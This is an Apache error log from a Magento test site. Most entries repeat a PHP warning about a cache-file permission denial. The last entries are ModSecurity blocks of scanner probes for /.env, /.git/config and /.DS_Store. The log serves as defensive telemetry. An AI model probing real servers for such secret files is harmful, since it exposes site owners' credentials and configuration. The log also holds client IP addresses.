[Fri Sep 08 09:20:11.871855 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.871875 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.876121 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.876138 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.880786 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.880803 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.884666 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.884683 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.116121 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.116152 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.118619 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.118641 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.233035 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.233077 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.551365 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.551411 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.576485 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.576513 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.580979 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.581003 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.584859 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.584884 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.589847 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.589868 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.593969 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.593995 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.598838 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.598858 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.603196 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.603216 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.608166 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.608189 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.612011 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.612030 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.616516 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.616535 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.620686 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.620704 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.624846 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.624864 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.734247 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.734278 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.738776 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.738800 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.743058 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.743085 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.750210 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.750232 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.754345 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.754366 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.758679 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.758698 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.762816 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.762836 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.766959 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:12.766977 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Sun Sep 24 23:19:06.370214 2023] [authz_core:error] [pid 2018710] [client 143.198.72.96:50050] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sun Sep 24 23:19:08.561505 2023] [:error] [pid 2018700] [client 143.198.72.96:50074] [client 143.198.72.96] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "ZRCnzLCaK3Nke4XaZy5R2gAAAAY"]
[Sun Sep 24 23:19:08.561705 2023] [:error] [pid 2018700] [client 143.198.72.96:50074] [client 143.198.72.96] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "ZRCnzLCaK3Nke4XaZy5R2gAAAAY"]
[Sun Sep 24 23:19:08.561857 2023] [:error] [pid 2018700] [client 143.198.72.96:50074] [client 143.198.72.96] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "ZRCnzLCaK3Nke4XaZy5R2gAAAAY"]
[Sun Sep 24 23:19:09.070429 2023] [:error] [pid 2018707] [client 143.198.72.96:50080] [client 143.198.72.96] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZRCnzQhGwYjK-jqZwTl_qQAAAAc"]
[Sun Sep 24 23:19:09.070685 2023] [:error] [pid 2018707] [client 143.198.72.96:50080] [client 143.198.72.96] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZRCnzQhGwYjK-jqZwTl_qQAAAAc"]
[Sun Sep 24 23:19:09.070866 2023] [:error] [pid 2018707] [client 143.198.72.96:50080] [client 143.198.72.96] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZRCnzQhGwYjK-jqZwTl_qQAAAAc"]
[Sun Sep 24 23:19:09.573645 2023] [:error] [pid 2018668] [client 143.198.72.96:50084] [client 143.198.72.96] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZRCnzW2Yee858hD4i9Mw6AAAAAE"]
[Sun Sep 24 23:19:09.573875 2023] [:error] [pid 2018668] [client 143.198.72.96:50084] [client 143.198.72.96] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZRCnzW2Yee858hD4i9Mw6AAAAAE"]
[Sun Sep 24 23:19:09.574086 2023] [:error] [pid 2018668] [client 143.198.72.96:50084] [client 143.198.72.96] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZRCnzW2Yee858hD4i9Mw6AAAAAE"]
[Wed Sep 27 09:36:58.636798 2023] [:error] [pid 2054236] [client 31.42.184.71:47612] [client 31.42.184.71] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZRPbms3U7Qll5HpMOVrqmgAAAAI"]
[Wed Sep 27 09:36:58.683776 2023] [:error] [pid 2054236] [client 31.42.184.71:47612] [client 31.42.184.71] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZRPbms3U7Qll5HpMOVrqmgAAAAI"]
